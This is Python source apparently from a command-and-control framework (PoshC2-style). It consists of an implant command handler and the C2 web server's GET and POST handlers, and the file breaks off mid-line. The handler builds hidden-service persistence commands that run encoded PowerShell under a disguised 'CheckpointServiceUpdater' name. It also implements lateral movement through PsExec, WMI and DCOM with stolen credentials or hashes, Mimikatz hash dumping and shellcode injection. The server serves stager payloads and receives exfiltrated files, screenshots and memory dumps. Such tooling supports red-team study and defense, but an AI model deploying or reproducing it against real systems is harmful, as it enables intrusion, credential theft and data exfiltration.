def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload): try: check_module_loaded("Stage2-Core.ps1", randomuri, user) except Exception as e: print("Error loading Stage2-Core.ps1: %s" % e) # alias mapping for alias in ps_alias: if command.startswith(alias[0]): command.replace(alias[0], alias[1]) command = command.strip() run_autoloads(command, randomuri, user) # opsec failures for opsec in ps_opsec: if opsec == command[:len(opsec)]: print(Colours.RED) print("**OPSEC Warning**") impid = get_implantdetails(randomuri) ri = input("Do you want to continue running - %s? (y/N) " % command) if ri.lower() == "n": command = "" if ri == "": command = "" break if command.startswith("beacon") or command.startswith("set-beacon") or command.startswith("setbeacon"): new_sleep = command.replace('set-beacon ', '') new_sleep = new_sleep.replace('setbeacon ', '') new_sleep = new_sleep.replace('beacon ', '').strip() if not validate_sleep_time(new_sleep): print(Colours.RED) print("Invalid sleep command, please specify a time such as 50s, 10m or 1h") print(Colours.GREEN) else: new_task(command, user, randomuri) update_sleep(new_sleep, randomuri) elif (command.startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) startup(user) elif command.startswith("searchhelp"): searchterm = (command).replace("searchhelp ", "") helpful = posh_help.split('\n') for line in helpful: if searchterm in line.lower(): print(line) elif (command == "back") or (command == "clear"): startup(user) elif command.startswith("install-servicelevel-persistencewithproxy"): C2 = get_c2server_all() if C2[11] == "": startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) new_task(cmd, user, randomuri) elif command.startswith("install-servicelevel-persistence"): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) new_task(cmd, user, randomuri) elif command.startswith("remove-servicelevel-persistence"): new_task("sc.exe delete CPUpdater", user, randomuri) # psexec lateral movement elif command.startswith("get-implantworkingdirectory"): new_task("pwd", user, randomuri) elif command.startswith("get-system-withproxy"): C2 = get_c2server_all() if C2[11] == "": startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri) elif command.startswith("get-system-withdaisy"): C2 = get_c2server_all() daisyname = input("Payload name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri) elif command.startswith("get-system"): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri) elif command == "quit": ri = input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": startup(user) if ri == "": sys.exit(0) if ri.lower() == "y": sys.exit(0) elif command.startswith("invoke-psexecproxypayload"): check_module_loaded("Invoke-PsExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createproxypayload first") elif command.startswith("invoke-psexecdaisypayload"): check_module_loaded("Invoke-PsExec.ps1", randomuri, user) daisyname = input("Payload name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-psexecpayload"): check_module_loaded("Invoke-PsExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-psexecpayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params, payload) new_task(cmd, user, randomuri) # wmi lateral movement elif command.startswith("invoke-wmiproxypayload"): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createproxypayload first") elif command.startswith("invoke-wmidaisypayload"): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) daisyname = input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-wmipayload"): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-wmipayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in command: p = re.compile(r"-credid (\w*)") credId = re.search(p, command) if credId: credId = credId.group(1) else: startup(user, "Please specify a credid") creds = get_cred_by_id(credId) if creds is None: startup(user, "Unrecognised CredID: %s" % credId) params = params.replace("-credid %s" % credId, "") if creds['Password']: params = params + "-domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password']) else: params = params + "-domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash']) cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params, payload) new_task(cmd, user, randomuri) # dcom lateral movement elif command.startswith("invoke-dcomproxypayload"): if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = params.sub("", command) p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % (target, payload) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createproxypayload first") elif command.startswith("invoke-dcomdaisypayload"): daisyname = input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-dcompayload"): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload) new_task(pscommand, user, randomuri) # runas payloads elif command.startswith("invoke-runasdaisypayload"): daisyname = input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() new_task("$proxypayload = \"%s\"" % payload, user, randomuri) check_module_loaded("Invoke-RunAs.ps1", randomuri, user) check_module_loaded("NamedPipeDaisy.ps1", randomuri, user) params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8")) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-runasproxypayload"): C2 = get_c2server_all() if C2[11] == "": startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload new_task(proxyvar, user, randomuri) check_module_loaded("Invoke-RunAs.ps1", randomuri, user) check_module_loaded("NamedPipeProxy.ps1", randomuri, user) params = re.compile("invoke-runasproxypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8")) new_task(pscommand, user, randomuri) elif command.startswith("invoke-runaspayload"): check_module_loaded("Invoke-RunAs.ps1", randomuri, user) check_module_loaded("NamedPipe.ps1", randomuri, user) params = re.compile("invoke-runaspayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8")) new_task(pscommand, user, randomuri) elif command == "help" or command == "?": print(posh_help) elif command == "help 1": print(posh_help1) elif command == "help 2": print(posh_help2) elif command == "help 3": print(posh_help3) elif command == "help 4": print(posh_help4) elif command == "help 5": print(posh_help5) elif command == "help 6": print(posh_help6) elif command == "help 7": print(posh_help7) elif command == "help 8": print(posh_help8) elif command.startswith("get-pid"): pid = get_implantdetails(randomuri) print(pid[8]) elif command.startswith("upload-file"): source = "" destination = "" s = "" nothidden = False if command == "upload-file": source = readfile_with_completion("Location of file to upload: ") while not os.path.isfile(source): print("File does not exist: %s" % source) source = readfile_with_completion("Location of file to upload: ") destination = input("Location to upload to: ") else: args = argp(command) source = args.source destination = args.destination nothidden = args.nothidden try: with open(source, "rb") as source_file: s = source_file.read() if s: sourceb64 = base64.b64encode(s).decode("utf-8") destination = destination.replace("\\", "\\\\") print("") print("Uploading %s to %s" % (source, destination)) if (nothidden): uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64) else: uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64) new_task(uploadcommand, user, randomuri) else: print("Source file could not be read or was empty") except Exception as e: print("Error with source file: %s" % e) traceback.print_exc() elif command == "kill-implant" or command == "exit": impid = get_implantdetails(randomuri) ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print("Implant not terminated") if ri == "": new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": new_task("exit", user, randomuri) kill_implant(randomuri) elif command.startswith("unhide-implant"): unhide_implant(randomuri) elif command.startswith("hide-implant"): kill_implant(randomuri) elif command.startswith("migrate"): params = re.compile("migrate", re.IGNORECASE) params = params.sub("", command) migrate(randomuri, user, params) elif command.startswith("loadmoduleforce"): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user, force=True) elif command.startswith("loadmodule"): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user) elif command.startswith("invoke-daisychain"): check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user) urls = get_allurls() new_task("%s -URLs '%s'" % (command, urls), user, randomuri) print("Now use createdaisypayload") elif command.startswith("inject-shellcode"): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) check_module_loaded("Inject-Shellcode.ps1", randomuri, user) readline.set_completer(shellcodefilecomplete) path = input("Location of shellcode file: ") t = tabCompleter() t.createListCompleter(COMMANDS) readline.set_completer(t.listCompleter) try: shellcodefile = load_file(path) if shellcodefile is not None: arch = "64" new_task("$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri) new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri) except Exception as e: print("Error loading file: %s" % e) elif command == "listmodules": print(os.listdir("%s/Modules/" % POSHDIR)) elif command == "modulesloaded": ml = get_implantdetails(randomuri) print(ml[14]) elif command == "ps": new_task("get-processlist", user, randomuri) elif command == "hashdump": check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user) new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri) elif command == "stopdaisy": update_label("", randomuri) new_task(command, user, randomuri) elif command == "stopsocks": update_label("", randomuri) new_task(command, user, randomuri) elif command == "sharpsocks": check_module_loaded("SharpSocks.ps1", randomuri, user) import string from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key().decode("utf-8") sharpurls = get_sharpurls() sharpurl = select_item("HostnameIP", "C2Server") sharpport = select_item("ServerPort", "C2Server") implant = get_implantdetails(randomuri) pivot = implant[15] if pivot != "PS": sharpurl = input("Enter the URL for SharpSocks: ") if (sharpport != 80 and sharpport != 443): if (sharpurl.count("/") >= 3): pat = re.compile(r"(?<!/)/(?!/)") sharpurl = pat.sub(":%s/" % sharpport, str, 1) else: sharpurl = ("%s:%s" % (sharpurl, sharpport)) print(POSHDIR + "SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN) ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ") if ri.lower() == "n": print("") if ri == "": new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls), user, randomuri) if ri.lower() == "y": new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls), user, randomuri) update_label("SharpSocks", randomuri) elif command == "history": startup(user, get_history()) elif command.startswith("reversedns"): params = re.compile("reversedns ", re.IGNORECASE) params = params.sub("", command) new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri) elif command.startswith("createdaisypayload"): createdaisypayload(user, startup) elif command.startswith("createproxypayload"): createproxypayload(user, startup) elif command.startswith("createnewpayload"): createproxypayload(user, startup) else: if command: new_task(command, user, randomuri) return
def do_POST(s): """Respond to a POST request.""" try: s.server_version = ServerHeader s.sys_version = "" content_length = int(s.headers['Content-Length']) s.cookieHeader = s.headers.get('Cookie') cookieVal = (s.cookieHeader).replace("SessionID=", "") post_data = s.rfile.read(content_length) logging.info( "POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(s.path), str(s.headers), post_data) now = datetime.datetime.now() result = get_implants_all() for i in result: implantID = i[0] RandomURI = i[1] Hostname = i[3] encKey = i[5] Domain = i[11] User = i[2] if RandomURI in s.path and cookieVal: update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"), RandomURI) decCookie = decrypt(encKey, cookieVal) rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:]) if decCookie.startswith("Error"): print(Colours.RED) print("The multicmd errored: ") print(rawoutput) print(Colours.GREEN) return taskId = str(int(decCookie.strip('\x00'))) taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId) executedCmd = get_cmd_from_task_id(taskId) task_owner = get_task_owner(taskId) print(Colours.GREEN) if task_owner is not None: print( "Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S"))) else: print( "Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S"))) try: outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput) outputParsed = outputParsed.rstrip() except: pass if "loadmodule" in executedCmd: print("Module loaded successfully") update_task(taskId, "Module loaded successfully") elif "get-screenshot" in executedCmd.lower(): try: decoded = base64.b64decode(outputParsed) filename = i[3] + "-" + now.strftime( "%m%d%Y%H%M%S_" + randomuri()) output_file = open( '%s%s.png' % (DownloadsDirectory, filename), 'wb') print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename)) update_task( taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename)) output_file.write(decoded) output_file.close() except Exception: update_task( taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!" ) print( "Screenshot not captured, the screen could be locked or this user does not have access to the screen!" ) elif (executedCmd.lower().startswith("$shellcode64")) or ( executedCmd.lower().startswith("$shellcode64")): update_task(taskId, "Upload shellcode complete") print("Upload shellcode complete") elif (executedCmd.lower().startswith( "run-exe core.program core inject-shellcode")): update_task(taskId, "Upload shellcode complete") print(outputParsed) elif "download-file" in executedCmd.lower(): try: filename = executedCmd.lower().replace( "download-file ", "") filename = filename.replace("-source ", "") filename = filename.replace("..", "") filename = filename.replace("'", "") filename = filename.replace('"', "") filename = filename.rsplit('/', 1)[-1] filename = filename.rsplit('\\', 1)[-1] filename = filename.rstrip('\x00') original_filename = filename chunkNumber = rawoutput[:5].decode("utf-8") print(chunkNumber) totalChunks = rawoutput[5:10].decode("utf-8") print(totalChunks) if (chunkNumber == "00001") and os.path.isfile( '%s/downloads/%s' % (ROOTDIR, filename)): counter = 1 while (os.path.isfile('%s/downloads/%s' % (ROOTDIR, filename))): if '.' in filename: filename = original_filename[:original_filename.rfind( '.')] + '-' + str( counter) + original_filename[ original_filename.rfind('.' ):] else: filename = original_filename + '-' + str( counter) counter += 1 if (chunkNumber != "00001"): counter = 1 if not os.path.isfile('%s/downloads/%s' % (ROOTDIR, filename)): print( "Error trying to download part of a file to a file that does not exist: %s" % filename) while (os.path.isfile('%s/downloads/%s' % (ROOTDIR, filename))): # First find the 'next' file would be downloaded to if '.' in filename: filename = original_filename[:original_filename.rfind( '.')] + '-' + str( counter) + original_filename[ original_filename.rfind('.' ):] else: filename = original_filename + '-' + str( counter) counter += 1 if counter != 2: # Then actually set the filename to this file - 1 unless it's the first one and exists without a counter if '.' in filename: filename = original_filename[:original_filename.rfind( '.')] + '-' + str( counter) + original_filename[ original_filename.rfind('.' ):] else: filename = original_filename + '-' + str( counter) else: filename = original_filename print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename)) update_task( taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename)) output_file = open( '%s/downloads/%s' % (ROOTDIR, filename), 'ab') output_file.write(rawoutput[10:]) output_file.close() except Exception as e: update_task(taskId, "Error downloading file %s " % e) print("Error downloading file %s " % e) traceback.print_exc() elif "safetydump" in executedCmd.lower(): rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:]) if rawoutput.startswith("[-]"): update_task(taskId, rawoutput) print(rawoutput) else: dumppath = "%sSafetyDump-Task-%s.bin" % ( DownloadsDirectory, taskIdStr) open(dumppath, 'wb').write(base64.b64decode(rawoutput)) message = "Dump written to: %s" % dumppath update_task(taskId, message) print(message) else: update_task(taskId, outputParsed) print(Colours.GREEN) print(outputParsed + Colours.END) except Exception as e: print(e) traceback.print_exc() pass finally: try: UriPath = str(s.path) sharpurls = get_sharpurls().split(",") sharplist = [] for i in sharpurls: i = i.replace(" ", "") i = i.replace("\"", "") sharplist.append("/" + i) if any(UriPath in s for s in sharplist): try: open("%swebserver.log" % ROOTDIR, "a").write( "[+] Making POST connection to SharpSocks %s%s\r\n" % (SocksHost, UriPath)) r = Request( "%s%s" % (SocksHost, UriPath), headers={ 'Cookie': '%s' % s.cookieHeader, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36' }) res = urlopen(r, post_data) sharpout = res.read() s.send_response(res.getcode()) s.send_header("Content-type", "text/html") s.send_header("Content-Length", len(sharpout)) s.end_headers() if (len(sharpout) > 0): s.wfile.write(sharpout) except HTTPError as e: s.send_response(res.getcode()) s.send_header("Content-type", "text/html") s.send_header("Content-Length", len(sharpout)) s.end_headers() open("%swebserver.log" % ROOTDIR, "a").write( "[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e) except Exception as e: s.send_response(res.getcode()) s.send_header("Content-type", "text/html") s.send_header("Content-Length", len(sharpout)) s.end_headers() open("%swebserver.log" % ROOTDIR, "a").write( "[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e) print( Colours.RED + "Error with SharpSocks connection - is SharpSocks running" + Colours.END) else: s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(default_response()) except Exception as e: print("Generic Error in SharpSocks")
def do_GET(s): """Respond to a GET request.""" logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(s.path), str(s.headers)) new_implant_url = get_newimplanturl() s.cookieHeader = s.headers.get('Cookie') QuickCommandURI = select_item("QuickCommand", "C2Server") UriPath = str(s.path) sharpurls = get_sharpurls().split(",") sharplist = [] for i in sharpurls: i = i.replace(" ", "") i = i.replace("\"", "") sharplist.append("/" + i) s.server_version = ServerHeader s.sys_version = "" if not s.cookieHeader: s.cookieHeader = "NONE" # implant gets a new task new_task = newTask(s.path) if new_task: s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(new_task) elif any(UriPath in s for s in sharplist): try: open("%swebserver.log" % ROOTDIR, "a").write( "%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (s.address_string(), s.log_date_time_string(), SocksHost, UriPath)) r = Request( "%s%s" % (SocksHost, UriPath), headers={ 'Accept-Encoding': 'gzip', 'Cookie': '%s' % s.cookieHeader, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36' }) res = urlopen(r) sharpout = res.read() s.send_response(200) s.send_header("Content-type", "text/html") s.send_header("Connection", "close") s.send_header("Content-Length", len(sharpout)) s.end_headers() if (len(sharpout) > 0): s.wfile.write(sharpout) except HTTPError as e: s.send_response(e.code) s.send_header("Content-type", "text/html") s.send_header("Connection", "close") s.end_headers() open("%swebserver.log" % ROOTDIR, "a").write( "[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e) except Exception as e: open("%swebserver.log" % ROOTDIR, "a").write( "[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e) print( Colours.RED + "Error with SharpSocks connection - is SharpSocks running" + Colours.END) elif ("%s_bs" % QuickCommandURI) in s.path: filename = "%spayload.bat" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%s_rg" % QuickCommandURI) in s.path: filename = "%srg_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%ss/86/portal" % QuickCommandURI) in s.path: filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%ss/64/portal" % QuickCommandURI) in s.path: filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%sp/86/portal" % QuickCommandURI) in s.path: filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%sp/64/portal" % QuickCommandURI) in s.path: filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%s_cs" % QuickCommandURI) in s.path: filename = "%scs_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%s_py" % QuickCommandURI) in s.path: filename = "%saes.py" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = "a" + "".join("{:02x}".format(c) for c in content) s.send_response(200) s.send_header("Content-type", "text/plain") s.end_headers() s.wfile.write(bytes(content, "utf-8")) elif ("%s_ex86" % QuickCommandURI) in s.path: filename = "%sPosh32.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "application/x-msdownload") s.end_headers() s.wfile.write(content) elif ("%s_ex64" % QuickCommandURI) in s.path: filename = "%sPosh64.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "application/x-msdownload") s.end_headers() s.wfile.write(content) # register new implant elif new_implant_url in s.path and s.cookieHeader.startswith( "SessionID"): implant_type = "PS" if s.path == ("%s?p" % new_implant_url): implant_type = "PS Proxy" if s.path == ("%s?d" % new_implant_url): implant_type = "PS Daisy" if s.path == ("%s?m" % new_implant_url): implant_type = "Python" if s.path == ("%s?d?m" % new_implant_url): implant_type = "Python Daisy" if s.path == ("%s?p?m" % new_implant_url): implant_type = "Python Proxy" if s.path == ("%s?c" % new_implant_url): implant_type = "C#" if s.path == ("%s?d?c" % new_implant_url): implant_type = "C# Daisy" if s.path == ("%s?p?c" % new_implant_url): implant_type = "C# Proxy" if implant_type.startswith("C#"): cookieVal = (s.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1]) Domain, User, Hostname, Arch, PID, Proxy = 